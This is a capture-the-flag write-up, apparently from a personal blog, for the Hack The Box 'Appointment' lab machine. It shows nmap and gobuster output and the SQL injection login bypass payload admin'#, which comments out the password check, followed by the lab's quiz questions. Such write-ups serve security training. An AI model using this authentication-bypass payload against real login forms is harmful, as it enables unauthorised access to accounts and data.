Very EasyTier 1Linux10.129.17.133

$ appointment.pwn()

A web application running on port 80 is vulnerable to SQL injection. By appending a MySQL comment character (#) to the username field, we bypass password validation entirely and log in as admin without knowing the password.

Techniques

SQL InjectionComment-based Auth BypassDirectory Enumeration

Open Ports

80/tcphttpApache httpd 2.4.38 (Debian)

Terminal Session

wazimu@htb ~ appointment

┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap 10.129.17.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-01 00:37 CDT
Nmap scan report for 10.129.17.133
Host is up (0.010s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ gobuster dir -u 10.129.17.133:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.17.133:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.17.133/images/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.17.133/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.17.133/js/]
/vendor               (Status: 301) [Size: 315] [--> http://10.129.17.133/vendor/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.17.133/fonts/]
/server-status        (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

# Bypassed credentials using SQL injection
# Username: admin'#
# Password: admin (anything works — the # comments out the password check)

[✓] Flag captured!

Tasks (10)

What does the acronym SQL stand for?

What is one of the most common type of SQL vulnerabilities?

What is the 2021 OWASP Top 10 classification for this vulnerability?

What does Nmap report as the service and version that are running on port 80 of the target?

What is the standard port used for the HTTPS protocol?

What is a folder called in web-application terminology?

What is the HTTP response code is given for 'Not Found' errors?

Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?

What single character can be used to comment out the rest of a line in MySQL?

10.

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

Root Flag

← All Writeups Cybersecurity Quizzes →